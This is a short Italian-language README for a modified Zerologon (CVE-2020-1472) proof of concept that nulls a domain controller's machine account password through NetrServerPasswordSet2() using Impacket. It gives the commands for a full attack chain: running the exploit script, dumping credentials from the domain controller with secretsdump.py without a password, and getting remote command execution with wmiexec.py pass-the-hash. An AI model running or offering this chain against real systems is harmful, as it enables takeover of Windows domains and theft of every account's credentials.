
Modificato il PoC di test di Secura, CVE-2020-1472, per impostare la password della macchina a null.
Modificato il PoC di test da Secura, CVE-2020-1472, per cambiare la password della macchina a null. La modifica della password sulla macchina utilizza la funzione NetrServerPasswordSet2() di Microsoft. Questo exploit sfrutta il modulo nrpc.py di Impacket per chiamare NetrServerPasswordSet2().
./zerologon_NULLPASS.py <dc-name> <dc-ip>

secretsdump.py -no-pass <dc-name>\$@<dc-ip>

wmiexec.py -hashes <LM:NT> <username>@<ip>
